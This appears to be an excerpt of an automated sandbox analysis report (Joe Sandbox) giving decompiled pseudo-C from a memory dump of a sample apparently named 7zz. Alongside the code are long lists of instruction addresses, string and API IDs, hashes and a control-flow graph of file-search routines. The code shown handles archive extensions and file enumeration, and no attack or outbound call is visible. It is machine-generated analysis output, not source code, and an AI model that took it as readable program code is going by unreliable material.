												__eflags =  *((intOrPtr*)(_t667 - 0x2c)) - _t641;
												if( *((intOrPtr*)(_t667 - 0x2c)) <= _t641) {
													goto L80;
												} else {
													goto L76;
												}
												while(1) {
													L76:
													_t660 =  *((intOrPtr*)( *(_t667 - 0x28) + _t500 * 4));
													_t433 = E0040807A(L"rar");
													__eflags = _t433 - _t641;
													if(_t433 == _t641) {
														break;
													}
													_t500 = _t500 + 1;
													__eflags = _t500 -  *((intOrPtr*)(_t667 - 0x2c));
													if(_t500 <  *((intOrPtr*)(_t667 - 0x2c))) {
														continue;
													}
													goto L80;
												}
												E00408784(_t667 - 0x34, _t500, 1);
												E00408767(_t667 - 0x34, __eflags, _t641);
												 *( *(_t667 - 0x28)) = _t660;
												goto L80;
											}
											goto L80;
										}
										goto L68;
									}
									_t437 = E00408053( *(_t667 - 0x48), L"001");
									__eflags = _t437 - _t641;
									if(_t437 != _t641) {
										goto L81;
									}
									goto L66;
								}
								__eflags =  *(_t667 + 0xc) - _t641;
								if( *(_t667 + 0xc) == _t641) {
									L24:
									E00404AD0(_t667 - 0x88, 4);
									 *((intOrPtr*)(_t667 - 0x88)) = 0x47a668;
									 *(_t667 - 0x5c) = _t641;
									 *(_t667 - 0x58) = _t641;
									 *((intOrPtr*)(_t667 - 0x60)) = 0x47a7ec;
									 *(_t667 - 4) = 5;
									L0040FA26(_t667 - 0x60, 0x200000);
									_t440 =  *(_t667 + 0x10);
									_t441 =  *((intOrPtr*)( *_t440 + 0x10))(_t440, _t641, _t641, _t641, _t641);
									__eflags = _t441 - _t641;
									if(_t441 == _t641) {
										 *(_t667 + 0xc) = 0x200000;
										_t441 = E0040FA74( *(_t667 + 0x10),  *(_t667 - 0x58), _t667 + 0xc);
										__eflags = _t441 - _t641;
										if(_t441 != _t641) {
											goto L25;
										}
										__eflags =  *(_t667 + 0xc) - _t641;
										if( *(_t667 + 0xc) != _t641) {
											 *(_t667 - 0x14) = _t641;
											 *(_t667 - 0x70) =  *(_t667 - 0x58);
											 *(_t667 - 0x10) = _t641;
											 *((intOrPtr*)(_t667 - 0x18)) = 0x47a7ec;
											 *(_t667 - 4) = 6;
											L0040FA26(_t667 - 0x18, 0x10000);
											 *(_t667 - 0x20) =  *(_t667 - 0x10);
											E0046CCB0( *(_t667 - 0x10), 0xff, 0x10000);
											_t670 = _t670 + 0xc;
											__eflags =  *((intOrPtr*)(_t667 - 0x2c)) - 0x100;
											if( *((intOrPtr*)(_t667 - 0x2c)) < 0x100) {
												_t449 = 0;
												__eflags =  *((intOrPtr*)(_t667 - 0x2c)) - _t641;
												if( *((intOrPtr*)(_t667 - 0x2c)) <= _t641) {
													L38:
													_t109 = _t667 + 0xc;
													 *_t109 =  *(_t667 + 0xc) - 1;
													__eflags =  *_t109;
													_t502 = _t641;
													if( *_t109 == 0) {
														L59:
														_t663 = 0;
														__eflags =  *((intOrPtr*)(_t667 - 0x2c)) - _t641;
														if( *((intOrPtr*)(_t667 - 0x2c)) <= _t641) {
															L63:
															E0040862D();
															_push(_t667 - 0x88);
															L00443F76(_t667 - 0x34);
															 *((intOrPtr*)(_t667 - 0x18)) = 0x47a7ec;
															L00407A18( *(_t667 - 0x10));
															 *((intOrPtr*)(_t667 - 0x60)) = 0x47a7ec;
															L00407A18( *(_t667 - 0x58));
															 *(_t667 - 4) = 3;
															E00408604(_t667 - 0x88);
															goto L81;
														} else {
															goto L60;
														}
														do {
															L60:
															_t457 =  *((intOrPtr*)( *(_t667 - 0x28) + _t663 * 4));
															__eflags = _t457 - 0xff;
															if(_t457 != 0xff) {
																E00415C6D(_t667 - 0x88, _t457);
															}
															_t663 = _t663 + 1;
															__eflags = _t663 -  *((intOrPtr*)(_t667 - 0x2c));
														} while (_t663 <  *((intOrPtr*)(_t667 - 0x2c)));
														goto L63;
													}
													while(1) {
														__eflags = _t502 -  *(_t667 + 0xc);
														if(__eflags >= 0) {
															goto L46;
														}
														while(1) {
															_t627 =  *(_t667 - 0x20);
															__eflags =  *((char*)(0 + _t627)) - 0xff;
															if( *((char*)(0 + _t627)) != 0xff) {
																break;
															}
															_t502 =  &(_t502[1]);
															__eflags = _t502 -  *(_t667 + 0xc);
															if(_t502 <  *(_t667 + 0xc)) {
																continue;
															}
															break;
														}
														__eflags = _t502 -  *(_t667 + 0xc);
														L46:
														if(__eflags == 0) {
															goto L59;
														}
														_t645 = 0 +  *(_t667 - 0x20);
														__eflags = _t645;
														_t666 =  *_t645 & 0x000000ff;
														do {
															_t462 =  *( *(_t667 - 0x28) + _t666 * 4);
															 *(_t667 - 0x4c) = _t462;
															_t463 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t667 + 8)) + 0x14)) + _t462 * 4));
															_t582 =  *(_t463 + 0x30);
															__eflags = _t582;
															 *(_t667 - 0x38) = _t582;
															if(_t582 == 0) {
																L55:
																_t645 = _t667 + _t666 - 0x188;
																goto L56;
															}
															__eflags =  &(_t502[_t582]) -  *(_t667 + 0xc) + 1;
															if( &(_t502[_t582]) >  *(_t667 + 0xc) + 1) {
																goto L55;
															}
															_t465 =  *((intOrPtr*)(_t463 + 0x34));
															_t587 = 0;
															__eflags =  *(_t667 - 0x38);
															if( *(_t667 - 0x38) <= 0) {
																L54:
																E00415C6D(_t667 - 0x88,  *(_t667 - 0x4c));
																 *( *(_t667 - 0x28) + _t666 * 4) = 0xff;
																 *_t645 =  *(_t667 + _t666 - 0x188);
																goto L56;
															}
															_t629 =  &(( *(_t667 - 0x70))[_t502]);
															__eflags = _t629;
															 *(_t667 - 0x3c) = _t629;
															while(1) {
																__eflags =  *( *(_t667 - 0x3c)) -  *((intOrPtr*)(_t587 + _t465));
																if( *( *(_t667 - 0x3c)) !=  *((intOrPtr*)(_t587 + _t465))) {
																	goto L55;
																}
																_t587 = _t587 + 1;
																 *(_t667 - 0x3c) =  *(_t667 - 0x3c) + 1;
																__eflags = _t587 -  *(_t667 - 0x38);
																if(_t587 <  *(_t667 - 0x38)) {
																	continue;
																}
																goto L54;
															}
															goto L55;
															L56:
															_t666 =  *_t645 & 0x000000ff;
															__eflags = _t666 - 0xff;
														} while (_t666 != 0xff);
														_t502 =  &(_t502[1]);
														__eflags = _t502 -  *(_t667 + 0xc);
														if(_t502 <  *(_t667 + 0xc)) {
															_t641 = 0;
															__eflags = 0;
															continue;
														}
														_t641 = 0;
														__eflags = 0;
														goto L59;
													}
												} else {
													goto L35;
												}
												do {
													L35:
													_t591 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t667 + 8)) + 0x14)) +  *( *(_t667 - 0x28) + _t449 * 4) * 4));
													__eflags =  *((intOrPtr*)(_t591 + 0x30)) - 2;
													if( *((intOrPtr*)(_t591 + 0x30)) >= 2) {
														_t594 = 0 +  *(_t667 - 0x20);
														__eflags = _t594;
														 *_t594 = _t449;
														 *((char*)(_t667 + _t449 - 0x188)) =  *_t594;
													}
													_t449 = _t449 + 1;
													__eflags = _t449 -  *((intOrPtr*)(_t667 - 0x2c));
												} while (_t449 <  *((intOrPtr*)(_t667 - 0x2c)));
												goto L38;
											}
											 *((intOrPtr*)(_t667 - 0x18)) = 0x47a7ec;
											L00407A18( *(_t667 - 0x10));
											 *((intOrPtr*)(_t667 - 0x60)) = 0x47a7ec;
											L00407A18( *(_t667 - 0x58));
											 *(_t667 - 4) = 3;
											E00408604(_t667 - 0x88);
											goto L32;
										}
										_t650 = 1;
										L29:
										 *((intOrPtr*)(_t667 - 0x60)) = 0x47a7ec;
										L00407A18( *(_t667 - 0x58));
										 *(_t667 - 4) = 3;
										E00408604(_t667 - 0x88);
										goto L127;
									}
									L25:
									_t650 = _t441;
									goto L29;
								}
								_t472 = E0040807A(L"exe");
								__eflags = _t472 - _t641;
								if(_t472 != _t641) {
									goto L64;
								}
								goto L24;
							}
							__eflags =  *(_t667 + 0xc) - 1;
							if( *(_t667 + 0xc) != 1) {
								goto L111;
							}
							E00408642(_t667 - 0x34, 1);
							goto L21;
						} else {
							goto L14;
						}
						do {
							L14:
							__eflags = L0041761D( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t667 + 8)) + 0x14)) + _t495 * 4)), _t667 - 0x48);
							if(__eflags < 0) {
								E00415C6D(_t667 - 0x34, _t495);
							} else {
								 *(_t667 + 0xc) =  *(_t667 + 0xc) + 1;
								 *(_t667 - 0x38) =  *(_t667 + 0xc) << 2;
								E00408767(_t667 - 0x34, __eflags,  *(_t667 + 0xc));
								 *( *(_t667 - 0x38) +  *(_t667 - 0x28)) = _t495;
							}
							_t479 =  *((intOrPtr*)(_t667 + 8));
							_t495 = _t495 + 1;
							__eflags = _t495 -  *((intOrPtr*)(_t479 + 0x10));
						} while (_t495 <  *((intOrPtr*)(_t479 + 0x10)));
						goto L18;
					}
					E00415C6D(_t667 - 0x34,  *(_t667 + 0xc));
					goto L92;
				} else {
					_t607 =  *((intOrPtr*)(_t667 - 0x6c));
					_t484 = _t607 + _t353 * 2 - 2;
					L4:
					L4:
					if( *_t484 == 0x2e) {
						_t486 = _t484 - _t607 >> 1;
					} else {
						goto L5;
					}
					L9:
					__eflags = _t486 - _t641;
					if(_t486 >= _t641) {
						__eflags = _t486 + 1;
						_t489 = L004072C9(_t667 - 0x6c, _t667 - 0x18, _t486 + 1);
						 *(_t667 - 4) = 2;
						E00401E26(_t667 - 0x48, _t489);
						 *(_t667 - 4) = 1;
						L00407A18( *((intOrPtr*)(_t667 - 0x18)));
					}
					goto L11;
					L5:
					if(_t484 == _t607) {
						_t486 = _t484 | 0xffffffff;
						__eflags = _t486;
						goto L9;
					} else {
						_t484 = _t484;
						goto L4;
					}
				}
			}








































































                                                                                  0x00417bb3
                                                                                  0x00417bb8
                                                                                  0x00417bc0
                                                                                  0x00417bc3
                                                                                  0x00417bc5
                                                                                  0x00417bc8
                                                                                  0x00417bcc
                                                                                  0x00417bd1
                                                                                  0x00417bd4
                                                                                  0x00417bd4
                                                                                  0x00417bd9
                                                                                  0x00417be2
                                                                                  0x00417be5
                                                                                  0x00417bef
                                                                                  0x00417bf2
                                                                                  0x00417bf5
                                                                                  0x00417bf8
                                                                                  0x00417bfb
                                                                                  0x00417c00
                                                                                  0x00417c03
                                                                                  0x00417c09
                                                                                  0x00417c55
                                                                                  0x00417c5a
                                                                                  0x00417c64
                                                                                  0x00417c67
                                                                                  0x00417c6a
                                                                                  0x00417c6e
                                                                                  0x00417c80
                                                                                  0x00417c83
                                                                                  0x00417c85
                                                                                  0x00417c88
                                                                                  0x00417c8b
                                                                                  0x00417cd7
                                                                                  0x00417cd7
                                                                                  0x00417cda
                                                                                  0x00417cf0
                                                                                  0x00417cf0
                                                                                  0x00417cf4
                                                                                  0x00417fba
                                                                                  0x00417fc2
                                                                                  0x00417fc7
                                                                                  0x00417fc9
                                                                                  0x00417fe0
                                                                                  0x00417fe0
                                                                                  0x00417fe3
                                                                                  0x00417fe6
                                                                                  0x00417ff6
                                                                                  0x00417ffa
                                                                                  0x00417fff
                                                                                  0x00418002
                                                                                  0x0041800c
                                                                                  0x0041800f
                                                                                  0x00418011
                                                                                  0x00418028
                                                                                  0x0041802b
                                                                                  0x0041802d
                                                                                  0x00418034
                                                                                  0x004183d8
                                                                                  0x004183db
                                                                                  0x004183df
                                                                                  0x004183e7
                                                                                  0x004183ef
                                                                                  0x004183f5
                                                                                  0x00417e21
                                                                                  0x00417e27
                                                                                  0x00417e2f
                                                                                  0x00417e2f
                                                                                  0x0041801c
                                                                                  0x0041801f
                                                                                  0x00418024
                                                                                  0x00418026
                                                                                  0x0041803f
                                                                                  0x00418043
                                                                                  0x004180d3
                                                                                  0x004180d6
                                                                                  0x004180da
                                                                                  0x004180e1
                                                                                  0x004180e7
                                                                                  0x004180e7
                                                                                  0x004180eb
                                                                                  0x00418194
                                                                                  0x00418194
                                                                                  0x00418197
                                                                                  0x0041819a
                                                                                  0x00417e00
                                                                                  0x00417e03
                                                                                  0x00417e07
                                                                                  0x00417e0f
                                                                                  0x00417e17
                                                                                  0x00417e20
                                                                                  0x00000000
                                                                                  0x00417e20
                                                                                  0x004181a0
                                                                                  0x004181a3
                                                                                  0x004181a5
                                                                                  0x004181a5
                                                                                  0x004181a8
                                                                                  0x004181aa
                                                                                  0x004181be
                                                                                  0x004181be
                                                                                  0x004181c7
                                                                                  0x004181cb
                                                                                  0x004181d1
                                                                                  0x004181e1
                                                                                  0x004181e6
                                                                                  0x004181e9
                                                                                  0x004181eb
                                                                                  0x004181f3
                                                                                  0x004181f5
                                                                                  0x0041820c
                                                                                  0x0041821b
                                                                                  0x0041821f
                                                                                  0x00418221
                                                                                  0x00418224
                                                                                  0x00418226
                                                                                  0x00418275
                                                                                  0x00418278
                                                                                  0x0041827c
                                                                                  0x0041827e
                                                                                  0x00418283
                                                                                  0x00418283
                                                                                  0x00418286
                                                                                  0x00418289
                                                                                  0x0041828d
                                                                                  0x00418295
                                                                                  0x0041829d
                                                                                  0x004182a3
                                                                                  0x00000000
                                                                                  0x004182a8
                                                                                  0x00418231
                                                                                  0x00418233
                                                                                  0x00418236
                                                                                  0x00418238
                                                                                  0x0041823c
                                                                                  0x00418241
                                                                                  0x00418241
                                                                                  0x00418244
                                                                                  0x00418244
                                                                                  0x00418247
                                                                                  0x004182ae
                                                                                  0x004182b0
                                                                                  0x004182cc
                                                                                  0x004182d0
                                                                                  0x004182d4
                                                                                  0x004182e0
                                                                                  0x004182e4
                                                                                  0x004182e7
                                                                                  0x004182eb
                                                                                  0x004182ed
                                                                                  0x004182f2
                                                                                  0x004182f5
                                                                                  0x004182f7
                                                                                  0x004182f7
                                                                                  0x00418300
                                                                                  0x00418300
                                                                                  0x00418308
                                                                                  0x0041830c
                                                                                  0x00418316
                                                                                  0x00418324
                                                                                  0x00418327
                                                                                  0x0041832a
                                                                                  0x0041838e
                                                                                  0x00418393
                                                                                  0x00418395
                                                                                  0x00418397
                                                                                  0x00418397
                                                                                  0x00418397
                                                                                  0x00418399
                                                                                  0x004183a2
                                                                                  0x004183a6
                                                                                  0x004183aa
                                                                                  0x004183b3
                                                                                  0x004183b7
                                                                                  0x004183bf
                                                                                  0x0041832c
                                                                                  0x00418335
                                                                                  0x0041833e
                                                                                  0x00418342
                                                                                  0x0041834d
                                                                                  0x00418351
                                                                                  0x00418355
                                                                                  0x00418359
                                                                                  0x00418362
                                                                                  0x00418366
                                                                                  0x0041836e
                                                                                  0x00418376
                                                                                  0x0041837e
                                                                                  0x00418383
                                                                                  0x004183c5
                                                                                  0x004183c8
                                                                                  0x004183cc
                                                                                  0x004183ce
                                                                                  0x004183d3
                                                                                  0x004183d3
                                                                                  0x004183d6
                                                                                  0x004183d6
                                                                                  0x004182b2
                                                                                  0x004182b2
                                                                                  0x004182b5
                                                                                  0x004182b9
                                                                                  0x004182bb
                                                                                  0x004182c4
                                                                                  0x004182c4
                                                                                  0x004182bb
                                                                                  0x00000000
                                                                                  0x004182b0
                                                                                  0x00418249
                                                                                  0x0041824c
                                                                                  0x00418250
                                                                                  0x00418252
                                                                                  0x00418257
                                                                                  0x00418257
                                                                                  0x00000000
                                                                                  0x00418252
                                                                                  0x00418208
                                                                                  0x00000000
                                                                                  0x00418208
                                                                                  0x004181ed
                                                                                  0x00000000
                                                                                  0x004181ed
                                                                                  0x004181b3
                                                                                  0x004181b6
                                                                                  0x004181b8
                                                                                  0x0041826e
                                                                                  0x00000000
                                                                                  0x0041826e
                                                                                  0x00000000
                                                                                  0x0041825a
                                                                                  0x0041825a
                                                                                  0x00418260
                                                                                  0x00418260
                                                                                  0x00000000
                                                                                  0x00418269
                                                                                  0x004180f9
                                                                                  0x00418105
                                                                                  0x00418111
                                                                                  0x00418114
                                                                                  0x00418118
                                                                                  0x00418120
                                                                                  0x00418127
                                                                                  0x00418133
                                                                                  0x0041813f
                                                                                  0x00418142
                                                                                  0x00418146
                                                                                  0x0041814b
                                                                                  0x0041814c
                                                                                  0x0041814e
                                                                                  0x00418151
                                                                                  0x00418154
                                                                                  0x00418156
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0041815b
                                                                                  0x0041815e
                                                                                  0x00418161
                                                                                  0x00418163
                                                                                  0x00418166
                                                                                  0x00418168
                                                                                  0x00418168
                                                                                  0x0041816a
                                                                                  0x0041816d
                                                                                  0x0041816f
                                                                                  0x00418171
                                                                                  0x00418171
                                                                                  0x00418173
                                                                                  0x00418177
                                                                                  0x00418178
                                                                                  0x00418178
                                                                                  0x0041817d
                                                                                  0x0041817f
                                                                                  0x00418181
                                                                                  0x00418183
                                                                                  0x0041818b
                                                                                  0x00418191
                                                                                  0x00418191
                                                                                  0x00418183
                                                                                  0x00000000
                                                                                  0x0041817f
                                                                                  0x00418049
                                                                                  0x00418052
                                                                                  0x00418054
                                                                                  0x00418058
                                                                                  0x0041805c
                                                                                  0x00418060
                                                                                  0x00418064
                                                                                  0x00418068
                                                                                  0x0041806c
                                                                                  0x0041806c
                                                                                  0x0041806e
                                                                                  0x0041806e
                                                                                  0x00418075
                                                                                  0x00418077
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00418079
                                                                                  0x0041807a
                                                                                  0x0041807d
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0041807f
                                                                                  0x00418083
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00418085
                                                                                  0x00418089
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0041808b
                                                                                  0x0041808d
                                                                                  0x00418090
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00418092
                                                                                  0x00418092
                                                                                  0x0041809a
                                                                                  0x004180a9
                                                                                  0x004180ae
                                                                                  0x004180b0
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004180b2
                                                                                  0x004180b3
                                                                                  0x004180b6
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004180b8
                                                                                  0x004180c0
                                                                                  0x004180c9
                                                                                  0x004180d1
                                                                                  0x00000000
                                                                                  0x004180d1
                                                                                  0x00000000
                                                                                  0x0041806e
                                                                                  0x00000000
                                                                                  0x00418026
                                                                                  0x00417fd3
                                                                                  0x00417fd8
                                                                                  0x00417fda
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00417fda
                                                                                  0x00417cfa
                                                                                  0x00417cfd
                                                                                  0x00417d14
                                                                                  0x00417d1c
                                                                                  0x00417d21
                                                                                  0x00417d2c
                                                                                  0x00417d2f
                                                                                  0x00417d32
                                                                                  0x00417d3e
                                                                                  0x00417d42
                                                                                  0x00417d47
                                                                                  0x00417d51
                                                                                  0x00417d54
                                                                                  0x00417d56
                                                                                  0x00417d65
                                                                                  0x00417d69
                                                                                  0x00417d6e
                                                                                  0x00417d70
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00417d72
                                                                                  0x00417d75
                                                                                  0x00417d9d
                                                                                  0x00417da0
                                                                                  0x00417da3
                                                                                  0x00417da6
                                                                                  0x00417db2
                                                                                  0x00417db6
                                                                                  0x00417dc5
                                                                                  0x00417dc8
                                                                                  0x00417dcd
                                                                                  0x00417dd0
                                                                                  0x00417dd7
                                                                                  0x00417e32
                                                                                  0x00417e34
                                                                                  0x00417e37
                                                                                  0x00417e70
                                                                                  0x00417e70
                                                                                  0x00417e70
                                                                                  0x00417e70
                                                                                  0x00417e73
                                                                                  0x00417e75
                                                                                  0x00417f4c
                                                                                  0x00417f4c
                                                                                  0x00417f4e
                                                                                  0x00417f51
                                                                                  0x00417f72
                                                                                  0x00417f75
                                                                                  0x00417f83
                                                                                  0x00417f84
                                                                                  0x00417f91
                                                                                  0x00417f94
                                                                                  0x00417f9c
                                                                                  0x00417f9f
                                                                                  0x00417fa5
                                                                                  0x00417fb0
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00417f53
                                                                                  0x00417f53
                                                                                  0x00417f56
                                                                                  0x00417f59
                                                                                  0x00417f5e
                                                                                  0x00417f67
                                                                                  0x00417f67
                                                                                  0x00417f6c
                                                                                  0x00417f6d
                                                                                  0x00417f6d
                                                                                  0x00000000
                                                                                  0x00417f53
                                                                                  0x00417e7f
                                                                                  0x00417e7f
                                                                                  0x00417e82
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00417e87
                                                                                  0x00417e87
                                                                                  0x00417e93
                                                                                  0x00417e97
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00417e99
                                                                                  0x00417e9a
                                                                                  0x00417e9d
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00417e9d
                                                                                  0x00417e9f
                                                                                  0x00417ea2
                                                                                  0x00417ea2
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00417ebb
                                                                                  0x00417ebb
                                                                                  0x00417ebd
                                                                                  0x00417ec0
                                                                                  0x00417ec6
                                                                                  0x00417ecc
                                                                                  0x00417ecf
                                                                                  0x00417ed2
                                                                                  0x00417ed5
                                                                                  0x00417ed7
                                                                                  0x00417eda
                                                                                  0x00417f2e
                                                                                  0x00417f2e
                                                                                  0x00000000
                                                                                  0x00417f2e
                                                                                  0x00417ee2
                                                                                  0x00417ee4
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00417ee6
                                                                                  0x00417ee9
                                                                                  0x00417eeb
                                                                                  0x00417eee
                                                                                  0x00417f0b
                                                                                  0x00417f14
                                                                                  0x00417f1c
                                                                                  0x00417f2a
                                                                                  0x00000000
                                                                                  0x00417f2a
                                                                                  0x00417ef3
                                                                                  0x00417ef3
                                                                                  0x00417ef5
                                                                                  0x00417ef8
                                                                                  0x00417efd
                                                                                  0x00417f00
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00417f02
                                                                                  0x00417f03
                                                                                  0x00417f06
                                                                                  0x00417f09
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00417f09
                                                                                  0x00000000
                                                                                  0x00417f35
                                                                                  0x00417f35
                                                                                  0x00417f38
                                                                                  0x00417f38
                                                                                  0x00417f40
                                                                                  0x00417f41
                                                                                  0x00417f44
                                                                                  0x00417e7d
                                                                                  0x00417e7d
                                                                                  0x00000000
                                                                                  0x00417e7d
                                                                                  0x00417f4a
                                                                                  0x00417f4a
                                                                                  0x00000000
                                                                                  0x00417f4a
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00417e39
                                                                                  0x00417e39
                                                                                  0x00417e45
                                                                                  0x00417e48
                                                                                  0x00417e4c
                                                                                  0x00417e5d
                                                                                  0x00417e5d
                                                                                  0x00417e61
                                                                                  0x00417e63
                                                                                  0x00417e63
                                                                                  0x00417e6a
                                                                                  0x00417e6b
                                                                                  0x00417e6b
                                                                                  0x00000000
                                                                                  0x00417e39
                                                                                  0x00417ddc
                                                                                  0x00417ddf
                                                                                  0x00417de7
                                                                                  0x00417dea
                                                                                  0x00417df0
                                                                                  0x00417dfb
                                                                                  0x00000000
                                                                                  0x00417dfb
                                                                                  0x00417d79
                                                                                  0x00417d7a
                                                                                  0x00417d7d
                                                                                  0x00417d80
                                                                                  0x00417d86
                                                                                  0x00417d90
                                                                                  0x00000000
                                                                                  0x00417d90
                                                                                  0x00417d58
                                                                                  0x00417d58
                                                                                  0x00000000
                                                                                  0x00417d58
                                                                                  0x00417d07
                                                                                  0x00417d0c
                                                                                  0x00417d0e
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00417d0e
                                                                                  0x00417cdc
                                                                                  0x00417ce0
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00417ceb
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00417c8d
                                                                                  0x00417c8d
                                                                                  0x00417c9f
                                                                                  0x00417ca1
                                                                                  0x00417cc9
                                                                                  0x00417ca3
                                                                                  0x00417cac
                                                                                  0x00417caf
                                                                                  0x00417cb5
                                                                                  0x00417cc0
                                                                                  0x00417cc0
                                                                                  0x00417cce
                                                                                  0x00417cd1
                                                                                  0x00417cd2
                                                                                  0x00417cd2
                                                                                  0x00000000
                                                                                  0x00417c8d
                                                                                  0x00417c76
                                                                                  0x00000000
                                                                                  0x00417c0b
                                                                                  0x00417c0b
                                                                                  0x00417c0e
                                                                                  0x00000000
                                                                                  0x00417c12
                                                                                  0x00417c16
                                                                                  0x00417c22
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00417c29
                                                                                  0x00417c29
                                                                                  0x00417c2b
                                                                                  0x00417c2d
                                                                                  0x00417c36
                                                                                  0x00417c3f
                                                                                  0x00417c43
                                                                                  0x00417c4b
                                                                                  0x00417c4f
                                                                                  0x00417c54
                                                                                  0x00000000
                                                                                  0x00417c18
                                                                                  0x00417c1a
                                                                                  0x00417c26
                                                                                  0x00417c26
                                                                                  0x00000000
                                                                                  0x00417c1c
                                                                                  0x00417c1d
                                                                                  0x00000000
                                                                                  0x00417c1d
                                                                                  0x00417c1a

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog
                                                                                  • String ID: !$000$001$R$Unknown error$a$c[@$exe$iso$r$rar$tI
                                                                                  • API String ID: 3519838083-4101332242
                                                                                  • Opcode ID: 206f97cf47abe644efdfadb335eb1742583df4d89bbfbb1961c776fc5318bc45
                                                                                  • Instruction ID: ff5ff08527ddfe2bc4deabd4e0b21c70904ab096e5b089e9ffbf148357062f4e
                                                                                  • Opcode Fuzzy Hash: 206f97cf47abe644efdfadb335eb1742583df4d89bbfbb1961c776fc5318bc45
                                                                                  • Instruction Fuzzy Hash: 7552C030D04248DFCF15DFA5C8809EEBBB5AF48314F24846EE445AB391DB389A86CF59
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0040B174 Relevance: 7.6, APIs: 5, Instructions: 88fileCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1935 40b174-40b18e __EH_prolog call 40b154 1938 40b194-40b19d 1935->1938 1939 40b27c-40b288 1935->1939 1940 40b20f-40b263 call 403532 AreFileApisANSI call 40822f FindFirstFileA call 407a18 * 2 1938->1940 1941 40b19f-40b1b7 FindFirstFileW 1938->1941 1947 40b273-40b279 1940->1947 1964 40b265-40b26e call 40b2ea 1940->1964 1943 40b1f9-40b1fd 1941->1943 1944 40b1b9-40b1dc call 401e9a call 40b863 1941->1944 1943->1947 1948 40b1ff-40b20d call 40b28b 1943->1948 1958 40b1ec-40b1f8 call 407a18 1944->1958 1959 40b1de-40b1ea FindFirstFileW 1944->1959 1947->1939 1948->1947 1958->1943 1959->1958 1964->1947
                                                                                  C-Code - Quality: 84%
                                                                                  			E0040B174(void** __ecx, void* __edi, void* __eflags) {
				signed int _t34;
				signed int _t36;
				void* _t47;
				void* _t53;
				void** _t77;
				void* _t79;
				intOrPtr _t86;

				L0046B890(0x473d64, _t79);
				_t77 = __ecx;
				_t34 = E0040B154(__ecx);
				if(_t34 == 0) {
					L11:
					 *[fs:0x0] =  *((intOrPtr*)(_t79 - 0xc));
					return _t34;
				}
				_t86 =  *0x490a7c; // 0x1
				if(_t86 == 0) {
					L00403532(_t79 - 0x24,  *(_t79 + 8));
					 *(_t79 - 4) = 1;
					_t36 = AreFileApisANSI();
					asm("sbb eax, eax");
					_push( ~_t36 + 1);
					 *_t77 = FindFirstFileA( *(E0040822F(_t79 - 0x30)), _t79 - 0x170);
					L00407A18( *((intOrPtr*)(_t79 - 0x30)));
					 *(_t79 - 4) =  *(_t79 - 4) | 0xffffffff;
					L00407A18( *((intOrPtr*)(_t79 - 0x24)));
					__eflags =  *_t77 - 0xffffffff;
					if(__eflags != 0) {
						L0040B2EA(_t79 - 0x170,  *((intOrPtr*)(_t79 + 0xc)), __eflags);
					}
					L10:
					_t34 = 0 |  *_t77 != 0xffffffff;
					goto L11;
				}
				_t47 = FindFirstFileW( *(_t79 + 8), _t79 - 0x3c0); // executed
				 *_t77 = _t47;
				if(_t47 != 0xffffffff) {
					L6:
					_t90 =  *_t77 - 0xffffffff;
					if( *_t77 != 0xffffffff) {
						L0040B28B(_t79 - 0x3c0,  *((intOrPtr*)(_t79 + 0xc)), _t90);
					}
					goto L10;
				}
				 *(_t79 - 0x18) = 0;
				 *((intOrPtr*)(_t79 - 0x14)) = 0;
